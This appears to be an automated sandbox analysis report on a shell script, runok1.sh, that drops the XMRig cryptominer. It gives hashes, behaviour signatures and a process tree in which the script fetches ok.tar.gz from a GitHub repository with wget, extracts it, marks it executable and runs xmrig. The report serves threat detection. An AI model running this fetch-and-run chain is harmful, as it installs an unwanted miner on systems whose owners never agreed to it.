Analysis

  • max time kernel
    2s
  • max time network
    1678s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    17-10-2024 00:29

General

  • Target

    runok1.sh

  • Size

    138B

  • MD5

    ed44ae7cc01f7bcc21c98a523afabd7c

  • SHA1

    4e7f50162eeb61715a948d3359639c6910088860

  • SHA256

    1663e111eceb895f9be9e87c6cfda675e506cd8ec88d144fd1a2b5dc7081d0de

  • SHA512

    e1c895b50b2b259d40501497ae4f9b2bb77b2d8713cd584d9c83cab82898f5e134ba6c8320810bf649867156494ea5b656143b71e269c9490da210d48a52982c

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 45 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 19 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 5 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/runok1.sh
    /tmp/runok1.sh
    1⤵
      PID:1399
      • /usr/bin/wget
        wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/ok.tar.gz
        2⤵
        • Writes file to tmp directory
        PID:1400
      • /usr/bin/tar
        tar xvf ok.tar.gz
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1446
        • /usr/local/sbin/gzip
          gzip -d
          3⤵
            PID:1447
          • /usr/local/bin/gzip
            gzip -d
            3⤵
              PID:1447
            • /usr/sbin/gzip
              gzip -d
              3⤵
                PID:1447
              • /usr/bin/gzip
                gzip -d
                3⤵
                  PID:1447
              • /usr/bin/chmod
                chmod +x xmrig
                2⤵
                • File and Directory Permissions Modification
                PID:1448
              • /tmp/ok/xmrig
                ./xmrig
                2⤵
                • Executes dropped EXE
                • Checks hardware identifiers (DMI)
                • Reads hardware information
                • Checks CPU configuration
                • Reads CPU attributes
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:1449

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /root/.wget-hsts

              Filesize

              215B

              MD5

              4a7f4389236eb4bf97f48c9e03b46515

              SHA1

              ca3af54e9ed7fa54979e30846e51b0e350051e88

              SHA256

              cc778efdca31a003e3c2b66ca707437eedf1f5013d29f56326992062c1354d11

              SHA512

              4c7b15421e28e5afc448c92575fceb546ddf78822d7309e1a4671b9f4c556e7e25942912da36f32137b7edfaafa1767ac0528fdcecda36090d5d7ecd89dbaf32

            • /tmp/ok.tar.gz

              Filesize

              2.9MB

              MD5

              773a7b4c82f833410d0af3c194b7cc0a

              SHA1

              fb9e28144dfec4c6aa8eed7ac1a035dd3d87b19c

              SHA256

              9c8cf5b3799e0639fd8a3840481546c2697a07b7db036b6f9543213a805fcf67

              SHA512

              1eba89af980787dca1ee0b57f145c261aa546429ddc7b0879af4574ba5d3c4250c7d32f988ccfe2ecf171f6f10fabe0b2e69fbfc2e903f2f87026a48b526907d

            • /tmp/ok/SHA256SUMS

              Filesize

              150B

              MD5

              7fd26dcea92a3ad3561867c5735c8ecc

              SHA1

              400fe1a03ef6d4520b88f0c63002266586cdaa0f

              SHA256

              c2db0386506ea30d3b7c375ff40dfc875c2aa7961beb7806a36cf12fc10405b6

              SHA512

              b114cee7f7da66afc53aca2013c63ed0d12740cca8ad46a5164789fe33f1889a2ec313186a29c4fc1dd30a11041db31bb307be1884e15680f4b7627143cbf6d8

            • /tmp/ok/config.json

              Filesize

              2KB

              MD5

              6b2a368c8fb65afcfdedf3790de06cec

              SHA1

              57725848151f6a3ff894d262cff6773a343b33a6

              SHA256

              64dda0b03564d8812657259c7df506e95ef6fb73afb3f69662c5a4f978d99156

              SHA512

              b4e30d3f926acbddbf4f12a6835dee0ec82c249d8ceea25848bc1fa087d4a9541864adb8ea665b3b63c8cc27dc49ab9df6629640026105616c94cf0d689f7c10

            • /tmp/ok/xmrig

              Filesize

              6.7MB

              MD5

              8f633ade35df4f992eb28a2c5bc37cef

              SHA1

              6b2fe529339896b22328dec8936219e7b8e3252f

              SHA256

              364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c

              SHA512

              8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73